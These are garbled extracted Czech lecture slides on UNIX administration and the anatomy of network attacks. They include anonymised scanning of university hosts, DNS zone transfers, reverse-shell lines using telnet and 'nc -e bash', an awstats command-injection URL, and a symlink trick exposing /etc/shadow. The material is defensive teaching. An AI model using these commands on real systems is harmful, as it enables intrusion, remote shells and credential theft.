Administrace UNIXu Leo Galamboš
Administrace UNIXu Leo Galamboš
2015
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
ˇ Cást I
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu
Administrace a prostˇredí
UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Obsah pˇrednášky
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
metodika správy UNIXu
Skenování
základní administrátorské cˇ innosti
ˇ rení der ˇ Proveˇ Získání pˇrístupu
sít’ování prostˇredí menší firemní síteˇ
UNIX MS-Windows
Posílení pˇrístupu UNIX
domácí sít’ (PXE+iSCSI, NAS+KVM) konkrétní techniky napadení a ochrany
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu Leo Galamboš
Internet
IPSec
Štít
Administrativa Útoky Anatomie
Lokalizace
Road warrior
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
Dohled
MS-Windows
Tisk
SMTP
Posílení pˇrístupu UNIX MS-Windows
Vykrádání
Zálohování
UNIX MS-Windows
DNS
Zakrytí stop UNIX
AMD
NIS/YP
MS-Windows
Zadní vrátka NFS
ˇ Záver
Požadavky na zápoˇcet a zkoušku
Administrace UNIXu Leo Galamboš Administrativa Útoky
Zápoˇcet
Anatomie
Lokalizace
konkrétní požadavky urˇcuje cviˇcící
Skenování
nutný pro pˇrihlášení ke zkoušce
ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX
Zkouška nejvýše jeden pˇredtermín (v pˇrípadeˇ zájmu) práveˇ 3 termíny v ˇrádném zkouškovém
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu Leo Galamboš Administrativa
Varování
Útoky Anatomie
Tato pˇrednáška popisuje obecné postupy, kterým je nutné bránit – efektivní obrana je vždy založena na znalosti formy útoku. Tento studijní materiál není v žádném pˇrípadeˇ návodem k jakýmkoliv nezákonným aktivitám.
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
ˇ Doplnkové zdroje: RFC2196
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
Administrace UNIXu
Tor
Leo Galamboš Administrativa
zakrytí vlastní identity a stop pˇri vyšetˇrování
Útoky
vrstvená architektura ("Onion network")
Lokalizace
aplikaˇcní nezávislost via TCP/SOCKS
Skenování
torbutton: Add-on pro Firefox
ˇ rení der ˇ Proveˇ
Anatomie
Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX
# tor-resolve www.cvut.cz 147.32.3.39 # tcpdump -i eth0 -n port 53 tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes ^C 0 packets captured 0 packets received by filter 0 packets dropped by kernel
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
Nevýhoda Tor Menší síla a variabilita jak vlastní botNET.
Leo Galamboš Administrativa Útoky Anatomie
# proxychains nmap -sT -PN -n -sV -p 21,22,80 www.fd.cvut.cz ProxyChains-3.1 (http://proxychains.sf.net)
Lokalizace
Starting Nmap 5.21 ( http://nmap.org ) at CENSORED CEST |DNS-request| www.fd.cvut.cz |S-chain|-<>-127.0.0.1:9050-<><>-CENSORED:53-<><>-OK |DNS-response| www.fd.cvut.cz is 147.32.100.7 |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:80-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:21-<--timeout |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:22-<><>-OK |S-chain|-<>-127.0.0.1:9050-<><>-147.32.100.7:80-<><>-OK Nmap scan report for www.fd.cvut.cz (147.32.100.7) Host is up (0.97s latency). PORT STATE SERVICE VERSION 21/tcp closed ftp 22/tcp open ssh OpenSSH 4.3p2 Debian 9etch3 (protocol 2.0) 80/tcp open http Apache httpd Service Info: OS: Linux
ˇ rení der ˇ Proveˇ
Nmap done: 1 IP address (1 host up) scanned in 27.16 seconds
Zadní vrátka
Skenování
Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
ˇ Záver
ˇ Vytežení DNS
Administrace UNIXu Leo Galamboš Administrativa
http://(vpn,fw,owa,outlook).cvut.cz/ ˇ vytežení DNS (AXFR) $ > > >
nslookup server 147.32.266.8 set type=ANY ls -d ex.cvut.cz.
# proxychains dig +tcp @CENSORED fd.cvut.cz AXFR ProxyChains-3.1 (http://proxychains.sf.net) |S-chain|-<>-127.0.0.1:9050-<><>-CENSORED:53-<><>-OK
Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX
; <<>> DiG 9.4.3-P5 <<>> +tcp @CENSORED fd.cvut.cz AXFR ; (1 server found) ;; global options: printcmd : fd.cvut.cz. IN NS ns.cvut.cz. fd.cvut.cz. IN NS ns1.horska.fd.cvut.cz. fd.cvut.cz. IN NS dhcp.fd.cvut.cz. _samba._tcp.fd.cvut.cz. IN SRV 10 1 139 firewall.fd.cvut.cz. _samba._tcp.fd.cvut.cz. IN SRV 10 1 445 firewall.fd.cvut.cz. _vlmcs._tcp.fd.cvut.cz. IN SRV 0 0 1688 kms.vc.cvut.cz. :
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
ˇ údaju˚ Sber
Administrace UNIXu Leo Galamboš Administrativa Útoky
webové prezentace, dceˇrinné spoleˇcnosti ˇ ˇ usenet) údaje o zamestnancích (sociální síte, IT: osoby chránící systémy MRK, SLS: social-hacking MNGMNT: nerozumí IT, mají ale moc
outsourcing www (poznámky v HTML)
Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX
struktura AS v okolí – útok na síteˇ bezpeˇcnostních složek ˇ Google map umožnuje orientaci na místeˇ cˇ inu ochrana(?): RFC 2196
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
ˇ (historických) údaju˚ Sber
Leo Galamboš Administrativa Útoky Anatomie
ˇ Webové stránky – zamestnanci, SW, IS/IT http://www.archive.org/ Usenet/NNTP
Webové stránky – Google
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu
1
Google hacking database Athena2 , SiteDigger3 , Nikto/Wikto4
UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
1
http://johny.ihackstuff.com/ghdb.php 2 http: //www.snakeoillabs.com/downloads/Athena2.0.msi 3 http://www.foundstone.com/ 4 http://www.sensepost.com/research/wikto
Zadní vrátka ˇ Záver
Problém veˇrejných bází (whois, dns registry)
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
obsahují citlivé údaje naivní správa domain hijacking 5 ˇ AOL pˇresmerována na autonete.net
mají webová rozhraní - archívy WWW stránek
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
(nedokonalé) ˇrešení: "anonymní"info@, POBox, atp.
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
5
autorizováno dle FROM položky z e-mailu
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
Skenování portu˚ a OS
Administrace UNIXu Leo Galamboš
ˇ TCP/UDP portu˚ v LISTENING stavu zjištení
Administrativa
side-effect: verze OS (dle chování IP stacku)
Útoky
pasivní detekce OS: siphon
Lokalizace
nmap mnoho typu˚ skenu˚ TCP full/SYN/FIN/Xmas/Null, stealth mód strobe a tcp_scan (SAINT) pouze tcp udp_scan (SATAN, SAINT) je spolehlivý, ale i dobˇre zachytitelný v IDS MS-Windows: Netcat, SuperScan, WUPS, ScanLine
Anatomie
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Ochrana Detekce pomocí a
UNIX MS-Windows
snorta .
Dokonalá ochrana neexistuje.
Zadní vrátka ˇ Záver
http://www.snort.org/
ICMP
Administrace UNIXu Leo Galamboš Administrativa Útoky
výborný protokol pro analytiku síteˇ velmi nebezpeˇcný, pokud je používán v plné šíˇri ˇ loki2 umožnuje tunelování via ICMP ECHO
Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX
Routery, CISCO ICMP 13 (timestamp) muže ˚ prozradit cˇ asovou zónu, tj. ˇ umístení. ICMP 17 (address mask) muže ˚ prozradit broadcast a vést k efektivnímu DoS.
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
DNS
Administrace UNIXu Leo Galamboš Administrativa
ˇ verze, patch úrovne, ˇ a nekdy ˇ Zjištení i typu a verze O/S
Útoky Anatomie
# dig @147.32.103.3 version.bind CH TXT
Lokalizace
; <<>> DiG 9.4.3-P5 <<>> @147.32.103.3 version.bind CH TXT ; (1 server found) ;; global options: printcmd ;; Got answer: ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62844 ;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 0 ;; WARNING: recursion requested but not available
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu ;; QUESTION SECTION: ;version.bind. CH TXT
UNIX MS-Windows
;; ANSWER SECTION: version.bind. 0 CH TXT "9.3.6-P1-RedHat-9.3.6-4.P1.el5_4.2"
Vykrádání
;; AUTHORITY SECTION: version.bind. 0 CH NS version.bind.
Zakrytí stop
UNIX MS-Windows
UNIX MS-Windows
Zadní vrátka ˇ Záver
cheops-ng.sf.net
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
Bannery
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
# telnet www.fd.cvut.cz 80 Trying 147.32.100.7... Connected to www.fd.cvut.cz. Escape character is ’^]’. HEAD / HTTP/1.0 HTTP/1.1 200 OK Date: CENSORED Server: Apache Connection: close Content-Type: text/html # telnet fdlin.fd.cvut.cz. smtp Trying 147.32.100.10... Connected to fdlin.fd.cvut.cz.. Escape character is ’^]’. 220 fdlin.fd.cvut.cz ESMTP Postfix
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Listování položek
Administrace UNIXu Leo Galamboš
MS RPC – epdump (Reskit), rpcdump6 MS NMB – nmbscan MS zdroje – DumpSec7 ˇ ruje, zda je DNS cache snooping: útoˇcník proveˇ záznam v keši
Administrativa Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
DNS AXFR (viz dˇríve)
MS-Windows
Posílení pˇrístupu UNIX
MS SMB null-session net use \\147.32.300.8\IPC$ ""/u:"" nebo vše v jednom skrze NBTEnuma
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX
a
http://ntsleuth.0catch.com/
MS-Windows
Zadní vrátka ˇ Záver 6 7
http://oss.coresecurity.com/impacket/rpcdump.py http://www.somarsoft.com/
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
Útoky na UNIX
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
brute-force: THC-Hydra8 buffer-overflow: stack/heap execution
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
nekontrolovaný vstup: telnet -l "-froot"147.32.300.69
MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver 8 9
http://freeworld.thc.org/thc-hydra/ Solaris 10 in.telnetd, podobneˇ AIX a rlogin
Administrace UNIXu
Reverse telnet Pˇres vadnou webovou aplikaci vyvolání telnet spoje k útoˇcníkovi
Leo Galamboš Administrativa
ˇ firewall ji vetšinou pustí do portu˚ 80, 8080 atp.
Útoky
útoˇcník použije nc (netcat) v listening režimu
Lokalizace
telnet ip 80 | bash | telnet ip 8080 ../awstats.pl?configdir=|echo%20;echo%20;telnet%20ip%2080. .
Anatomie
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
jednodušeji též nc -e bash ip 80
MS-Windows
Posílení pˇrístupu UNIX MS-Windows
8080
Vykrádání UNIX MS-Windows
bash
Zakrytí stop UNIX MS-Windows
80
Zadní vrátka ˇ Záver
BIND/DNS
Administrace UNIXu Leo Galamboš Administrativa Útoky
DNS cache poisoning podvržení záznamu˚ v DNS keši citlivé jen pro konkrétní verze (skenování version.bind)
Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
vyvolání sekvence dotazu˚ – CNAME, delegování – a odhalení sekvence portu˚ a DNS ID
MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
DNS TSIG overflow (starší verze BIND)
UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
SSH
Leo Galamboš
ˇ ˇ v OpenSSH Existovalo nekolik vážných der
Administrativa
napˇríklad int overflow v challenge-response auth proceduˇre
Útoky
útoˇcník získá práva root-a
Skenování
Anatomie
Lokalizace
ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu
Monitor
UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Kryptomateriál
UNIX MS-Windows
Útočník
Otrok 1
Otrok 2
Systém
Zadní vrátka ˇ Záver
Útok na promisc mód
Administrace UNIXu Leo Galamboš Administrativa Útoky
ˇ typicky pod root-em monitoring, IDS beží
Anatomie
Lokalizace
vhodneˇ podvržený packet dokáže prostˇrelit systém
Skenování
ˇ úspešné útoky na tcpdump i snort
ˇ rení der ˇ Proveˇ
ˇ infikovaný doplatí na svoji "zvedavost"
Získání pˇrístupu UNIX MS-Windows
útoˇcník cíl nijak nekontaktuje!
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Viz. Hispahack Research Team http://hispahack.ccc.de/
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
Útoky na MS-Windows
Leo Galamboš Administrativa Útoky Anatomie
autentizaˇcní spoofing: brute-force, MTM, slovník vzdálený útok: Metasploit10 útok na aplikace: Office,
IE11
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX
útok na ovladaˇce: Netgear 802.11 Beacon remote code execution12
MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka 10
testy zranitelností http://framework.metasploit.com/ Napˇríklad buffer-overflow LoadAniIcon/user32.dll 12 Cache, Moore, skape http://www.uninformed.org/?v=all&a=29&t=sumry 11
ˇ Záver
Autentizaˇcní spoofing
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
software: enum, Brutus, Medusa, Venom, ad. ˇ pˇri správné politice nebývá úspešný
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Ochrana Dobrá bezpeˇcnostní pravidla, napˇr. silná hesla, zamykání hesla, kontrola Event logu,. . .
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Odposlech hesla
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
Útok na LanManager, NTLM a Kerberos LN se láme nejlépe: Cain, LCP13 , l0pthcrack ˇ brute-force, slovník NTLM se láme špatne:
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
K5 lze zlomit slovníkovým útokem na první packet zašifrovaný klíˇcem odvozeným z hesla
Posílení pˇrístupu
Cain láme vše, navíc umí ARP spoof
Vykrádání
UNIX MS-Windows
UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
13
http://www.lcpsoft.com/
MTM: spící muž uprostˇred
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
Lokalizace
smbrelay a smbproxy14 Cain
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Ochrana
Posílení pˇrístupu UNIX
Autentizace a šifrování komunikace. Firewall s IPsec?
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
14
crackují heše hesel
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
Analýza a prověření cílů a uživatelských účtů Výpisy účtů, zdrojů, SNMP, identifikace aplikací,... Nářadí: null sessions, DumpSec, showmount, nmbscan, rpcinfo, nmap, snmpwalk, snmpcheck, netcat...
ˇ rení der ˇ Proveˇ Vytěžení cílů
Získání přístupu
Zvýšení získaných oprávnění
Skenování
Prověření děr
Sniffing hesel, brute-force, penetrační programy,... Nářadí: dsniff, Cain&Abel, phoss, hydra, SIPcrack, Metasploit framework, airsnarf, kismet,...
Posílení přístupu
UNIX MS-Windows
Posílení pˇrístupu
Password cracking, exploits, script kiddies, ... Nářadí: john, rcrack, ophcrack, Cain, ntbf, LCP,...
UNIX
Vykrádání
Opětovné vytěžování nově získaných zdrojů Zneužívání důvěry, analýza dostupných dat (hesla, kódy),... Nářadí: rhosts, ssh/ssh-keygen, LSA secrets, C&A, /etc,...
Zakrytí průniku před administrátory a dozorem
Získání pˇrístupu
MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop
Vyčištění logů, zakrytí „nového“ software,... Nářadí: logclean-ng, wtmpclean, rootkity, file streaming,...
Zakrytí stop Vytvoření vrátek a mostů pro opětovné získání nadvlády
Zadní vrátka
?
UNIX MS-Windows
Nové účty, cron-job, startup infekce, monitoring, trojani… Nářadí: cron, rc, registry, keylog, VNC, psexec, ssh a login s patchi,...
Zadní vrátka ˇ Záver
Symlink hack
Administrace UNIXu Leo Galamboš Administrativa Útoky Anatomie
symlink vedeme na systémový soubor
Lokalizace
ˇ práva vadnou utilitu necháme zmenit
Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Solaris-like pˇríklad
Posílení pˇrístupu UNIX MS-Windows
$ ln -s /etc/shadow /var/dt/appconfig/appmanager/generic-display-0 $ /usr/dt/bin/dtappgather MakeDirectory: /var/dt/appconfig/appmanager/generic-display-0: File exists $ ls -l /etc/shadow -r-xr-xr-x 1 ivan staff ....
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
UNIX
Administrace UNIXu Leo Galamboš Administrativa
Core file
Útoky Anatomie
vyvolání coredump v serverové aplikaci
Lokalizace
výsledný dump muže ˚ obsahovat cˇ ásti shadow báze
Skenování
ˇ úspešné na FTPD (pˇri PASV pˇred nalogováním)
ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu
Race conditions na wu-ftpd ABOR zpusoboval ˚ SIGURG
UNIX MS-Windows
Vykrádání UNIX
zavˇrení portu data-spoje vyvolalo SIGPIPE SIGPIPE: dologout()-uid0-writeLogs-closeLogs-exit
MS-Windows
Zakrytí stop UNIX MS-Windows
ABOR po pˇrechodu na uid0 dává root-a po FTP
Zadní vrátka ˇ Záver
UNIX
Administrace UNIXu Leo Galamboš Administrativa
Sdílené knihovny modifikace LD_PRELOAD ˇ in.telnetd umožnoval aktivaci s modifikovaným LD_PRELOAD a aktivace /bin/login pak muže ˚ linkovat povrženou autentizaˇcní rutinu
Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX
Vady kernelu - cˇ istý exploit z ringu 0 eskalace z “libovolného” uživatele na root-a
MS-Windows
Vykrádání UNIX MS-Windows
ˇ SELinux a spol. pomuže ˚ jen nekdy napˇríklad vada ovladaˇcu˚ LKM: enyelkm, SucKIT, MoodNT
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
Administrace UNIXu
Microsoft Windows
Leo Galamboš Administrativa Útoky Anatomie
Lokalizace Skenování ˇ rení der ˇ Proveˇ
ˇ vetšina slabin se pravidelneˇ opravuje getadmin útoky skrze DLL
injection15
Získání pˇrístupu UNIX MS-Windows
Posílení pˇrístupu UNIX MS-Windows
Vykrádání UNIX MS-Windows
Zakrytí stop UNIX MS-Windows
Zadní vrátka ˇ Záver
15
Vyžaduje interaktivní sezení
Administrace UNIXu
Anatomie útoku
Leo Galamboš Zajištění prostoru jmen, IP adres, zájmových osob
Lokalizace
Administrativa
Veřejné vyhledávací služby, whois báze, DNS, AXFR,… Nářadí: dig, nslookup, dnsmap, whois, DNSpredict, fierce,...
Útoky Skenování
Zjištění (vstupních) cílů Skenery TCP/UDP služeb, detekce OS, verzí démonů, ... Nářadí: fping, nmap, amap, xprobe2, SinFP,...
Anatomie
Lokalizace
